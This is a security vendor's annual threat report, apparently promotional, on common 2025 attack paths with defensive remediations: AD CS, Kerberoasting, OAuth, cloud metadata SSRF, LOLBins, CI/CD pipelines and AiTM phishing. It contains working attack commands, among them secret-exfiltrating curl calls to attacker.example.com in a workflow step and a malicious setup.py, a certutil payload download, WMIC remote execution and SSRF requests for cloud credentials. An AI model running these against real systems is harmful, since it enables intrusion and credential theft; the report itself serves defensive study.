Every year, the threat landscape shifts in ways that catch even well-prepared organizations off guard. In 2025, Redfox Cybersecurity conducted penetration tests, red team operations, and incident response engagements across financial services, healthcare, manufacturing, and SaaS companies. What we found was not a story of exotic zero-days. It was a story of systematic exploitation of misconfigurations, identity weaknesses, and legacy trust relationships that defenders either overlooked or deprioritized.
This report documents the most frequently observed and most impactful attack vectors from those engagements. Each section includes real-world techniques, tooling, and representative command examples so that defenders, architects, and security engineers can evaluate their own exposure. If your team wants a structured, hands-on assessment of these vectors against your own environment, Redfox Cybersecurity's adversarial services are built to surface exactly this kind of risk before attackers do.
Active Directory Certificate Services remained the single most exploited internal pathway we encountered across engagements this year. Organizations that had invested heavily in credential hygiene and MFA still fell victim to privilege escalation through misconfigured certificate templates, because AD CS abuse often bypasses authentication controls entirely.
The most commonly exploited misconfiguration was ESC1: certificate templates that allow the requester to specify a Subject Alternative Name (SAN), combined with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag and enrollment rights granted to low-privileged users.
Using Certify to enumerate vulnerable templates:
Certify.exe find /vulnerable
[cta]
When a vulnerable template surfaces, an attacker with domain user privileges can request a certificate for any identity, including a Domain Admin:
Certify.exe request /ca:corp-CA\corp-dc01 /template:VulnerableUserTemplate /altname:administrator
[cta]
The resulting PFX certificate is then converted and used with Rubeus to obtain a Kerberos TGT:
Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:certpass /ptt
[cta]
This chain moves from a standard domain user account to full domain compromise without touching a single password hash, which means tools that rely on credential-based detections miss the attack entirely.
A secondary variant we observed in multi-domain environments was ESC8, where attackers relayed NTLM authentication from a domain controller to the AD CS HTTP enrollment endpoint using ntlmrelayx with a targeted configuration:
ntlmrelayx.py -t http://corp-ca01/certsrv/certfnsh.asp \
--adcs \
--template DomainController \
-smb2support
[cta]
From a defensive standpoint, organizations should audit all certificate templates using the Get-ADCSTemplateAcl PowerShell function, enforce PEND_ALL_REQUESTS on sensitive templates, and enable Extended Protection for Authentication on all AD CS web endpoints.
Kerberoasting is not new, but in 2025 we observed it being applied more precisely. Attackers, including nation-state affiliated groups we tracked in incident response work, are no longer blindly roasting every SPN-bearing account. Instead, they use targeted reconnaissance to identify service accounts associated with high-value systems before requesting tickets.
Using BloodHound Community Edition with the SharpHound collector to map service account privilege paths:
SharpHound.exe -c All --outputdirectory C:\temp\bh_output
[cta]
Once high-value service accounts are identified through BloodHound path analysis, Kerberoasting is executed selectively using Rubeus with RC4 downgrade enforcement to speed up offline cracking:
Rubeus.exe kerberoast /user:svc_sqlprod /nowrap /tgtdeleg
[cta]
The resulting hashes are exported and cracked offline using Hashcat with a targeted rule set:
hashcat -m 13100 svc_sqlprod.hash /opt/wordlists/rockyou.txt \
-r /opt/hashcat/rules/best64.rule \
--status --status-timer=30
[cta]
The accounts most commonly cracked were provisioned years ago with weak passwords and never rotated, because no automated policy enforced rotation on service accounts. Redfox Cybersecurity recommends deploying Group Managed Service Accounts (gMSAs), which automatically rotate 240-character randomly generated passwords, as the primary remediation.
For organizations that want to assess how exposed their Kerberoastable accounts are in a controlled, scoped engagement, reviewing Redfox Cybersecurity's Active Directory security services is a practical starting point.
Across cloud engagements, particularly in Microsoft 365 and AWS environments, Redfox Cybersecurity encountered a consistent pattern: OAuth applications registered with overly permissive scopes, open redirect URIs, or missing state parameter validation. These weaknesses, when combined, enable authorization code interception and account takeover without phishing credentials.
A representative attack pattern we documented involved an OAuth application that accepted wildcard redirect URIs (https://app.example.com/*). An attacker could register a redirect to an attacker-controlled subdomain path and craft a malicious authorization link:
https://login.microsoftonline.com/{tenant-id}/oauth2/v2.0/authorize?
client_id=TARGET_APP_CLIENT_ID
&response_type=code
&redirect_uri=https://app.example.com/callback/../../../attacker.example.com/catch
&scope=Mail.Read%20Files.ReadWrite.All
&state=FIXED_VALUE_NO_CSRF
[cta]
When a victim clicks this link while authenticated, the authorization code is delivered to the attacker's server. Because the state parameter was static and not validated server-side, CSRF-based token injection was also feasible in the same codebase.
GraphSpy provides a clean interface for post-compromise OAuth scope abuse in Microsoft 365 environments. After capturing a valid access token:
graphspy --token eyJ0eXAiOiJKV1Q... list-permissions
graphspy --token eyJ0eXAiOiJKV1Q... read-mail --user victim@corp.com
graphspy --token eyJ0eXAiOiJKV1Q... download-files --user victim@corp.com
[cta]
This type of token-based lateral movement is particularly difficult to detect because it produces legitimate Microsoft Graph API calls from a registered application identity, not from a user account with a suspicious login location.
Remediating this class of vulnerability requires enforcing exact-match redirect URI validation, rotating client secrets on a defined schedule, auditing registered applications for scope creep using Microsoft Entra's App Governance module, and restricting user consent to admin-approved applications only.
Server-Side Request Forgery targeting cloud metadata services was the initial access vector in a significant portion of our cloud-focused red team engagements in 2025. Applications running on AWS EC2, GCP Compute Engine, or Azure VMs that fail to validate outbound request destinations can be abused to reach the internal metadata endpoint and retrieve IAM credentials.
In environments where Instance Metadata Service v1 was still enabled (which was more common than expected, especially in older autoscaling groups), a straightforward SSRF payload reaches the credential endpoint:
GET /?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: vulnerable-app.corp.com
[cta]
The application fetches the metadata URL and reflects the role name in its response. A second request retrieves the credentials:
GET /?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role HTTP/1.1
Host: vulnerable-app.corp.com
[cta]
The returned JSON contains AccessKeyId, SecretAccessKey, and Token. These are immediately usable with the AWS CLI:
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws sts get-caller-identity
aws s3 ls
aws iam list-attached-role-policies --role-name prod-ec2-role
[cta]
In engagements, the first action after confirming identity was enumeration of IAM permissions using enumerate-iam, a tool that brute-forces allowed API calls against the AWS IAM policy:
python3 enumerate-iam.py \
--access-key ASIA... \
--secret-key ... \
--session-token ... \
--region us-east-1
[cta]
From there, attackers moved toward S3 bucket enumeration, Lambda function code exfiltration, and in two cases, EC2 instance profile chaining to escalate into administrative roles.
Enforcing IMDSv2, which requires a PUT-based token request before credentials are accessible and cannot be triggered through a single-request SSRF, eliminates this vector entirely on AWS. Teams looking for a comprehensive cloud security posture review can explore Redfox Cybersecurity's cloud penetration testing services to address these exposure areas before they become incidents.
In mature environments with EDR coverage, we observed a clear trend in 2025: skilled adversaries are not dropping custom binaries. They are chaining built-in Windows binaries and scripting hosts to achieve execution, persistence, and lateral movement in ways that generate minimal high-fidelity alerts.
MSBuild, a legitimate Microsoft build tool present on most Windows systems, accepts XML project files that can contain inline C# tasks compiled and executed entirely in memory:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Exec">
<MSBuildExec />
</Target>
<UsingTask TaskName="MSBuildExec"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using Microsoft.Build.Framework;
using System;
using System.Net;
public class MSBuildExec : ITask {
public IBuildEngine BuildEngine { get; set; }
public ITaskHost HostObject { get; set; }
public bool Execute() {
// shellcode or reflective load goes here
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
[cta]
Invoked with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
[cta]
WMIC-based remote process execution remains viable in environments that have not disabled it via Group Policy:
wmic /node:TARGET_IP /user:DOMAIN\user /password:pass process call create \
"powershell.exe -nop -enc BASE64ENCODEDPAYLOAD"
[cta]
CertUtil is abused for file download to bypass application whitelisting:
certutil.exe -urlcache -split -f http://attacker-infra.example.com/payload.bin C:\ProgramData\payload.bin
[cta]
Detecting LOLBin abuse requires behavioral analysis rather than signature matching. Recommended detections include parent-child process anomaly rules (MSBuild spawning unexpected children), command-line argument entropy analysis for Base64 encoded payloads, and network connection alerts for known LOLBins like CertUtil initiating outbound HTTP.
In 2025, Redfox Cybersecurity was engaged on several assessments focused specifically on the software delivery pipeline. What we found was that developer-facing infrastructure, including GitHub Actions workflows, self-hosted runners, artifact registries, and secrets management integrations, carried attack surface that was orders of magnitude more permissive than the production environments they built and deployed.
When a public GitHub repository accepts pull requests and uses pull_request_target in a workflow that checks out attacker-controlled code, environment secrets become accessible. A malicious pull request can inject a step into the workflow:
- name: Exfil secrets
run: |
curl -s -X POST https://attacker.example.com/collect \
-d "token=${{ secrets.PROD_DEPLOY_TOKEN }}" \
-d "aws_key=${{ secrets.AWS_ACCESS_KEY_ID }}"
[cta]
The secrets are exfiltrated before any reviewer can intervene, because the workflow runs automatically on the target repository's runner with full secret access.
We replicated dependency confusion attacks in several internal package registry environments. When an internal Python package named corp-internal-sdk is not published to PyPI, an attacker can publish a malicious package with the same name to the public index at a higher version number. pip install will resolve the public version:
pip install corp-internal-sdk # resolves to attacker package if not pinned to internal registry
[cta]
The payload in the attacker's setup.py runs at install time:
from setuptools import setup
import subprocess, os
subprocess.Popen([
"curl", "-s",
f"https://attacker.example.com/c2?h={os.environ.get('HOSTNAME')}&u={os.environ.get('USER')}"
])
setup(name="corp-internal-sdk", version="9.9.9")
[cta]
Remediation requires pinning internal package names in a private registry with upstream blocking, enforcing --index-url to point exclusively at the internal mirror, and implementing dependency review automation in CI pipelines.
The assumption that MFA stops phishing was invalidated repeatedly in 2025 engagements. Adversary-in-the-Middle (AiTM) phishing frameworks proxy authentication in real time, capturing session cookies after the victim completes MFA. The attacker never needs the OTP or the password, only the authenticated session.
Evilginx3, a mature AiTM framework, is configured using phishlets that define how to proxy a target application. A representative Evilginx3 session setup targeting Microsoft 365 looks like this at the configuration level:
phishlets hostname o365 login.corp-secure-portal.com
phishlets enable o365
lures create o365
lures get-url 0
[cta]
When a victim authenticates through the proxied page, Evilginx3 captures the session cookie bound to their authenticated session. The attacker replays this cookie directly:
# Using the captured session cookie in a curl request to Graph API
curl -H "Cookie: ESTSAUTH=CAPTURED_COOKIE_VALUE" \
https://graph.microsoft.com/v1.0/me/messages
[cta]
Defeating AiTM attacks requires phishing-resistant MFA, specifically FIDO2 hardware keys or certificate-based authentication, because these bind the authentication assertion to the origin domain. A session cookie captured from a proxied domain is cryptographically useless against an application enforcing FIDO2.
Organizations assessing their identity security posture and MFA resilience should consider a targeted engagement from Redfox Cybersecurity's red team services to validate real-world resilience before a campaign does.
The 2025 engagement data from Redfox Cybersecurity points to a clear pattern: attackers are not relying on novel techniques. They are exploiting the gap between how organizations believe their controls work and how those controls perform under real adversarial pressure.
AD CS misconfigurations persist because certificate services are rarely included in routine security reviews. Kerberoastable service accounts survive because password policies exclude service accounts. OAuth apps accumulate excessive permissions because no one audits app registrations after initial deployment. Metadata endpoints stay exposed because IMDSv1 is the default in older infrastructure. LOLBin abuse succeeds because EDR tuning is treated as a one-time task rather than an ongoing process. CI/CD pipelines carry production secrets because developer experience is prioritized over least-privilege enforcement. And AiTM phishing works because MFA is treated as a final control rather than one layer in a defense-in-depth architecture.
The remediation path for each of these vectors is well understood. The challenge is executing remediation systematically, at scale, and with validation that the controls actually work as intended. That is precisely what structured adversarial testing delivers. If any of the attack patterns documented in this report resemble your own environment, the appropriate next step is a scoped engagement, not a questionnaire. Redfox Cybersecurity's team is available to help organizations assess, validate, and harden against every vector covered here through purpose-built penetration testing and red team services.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
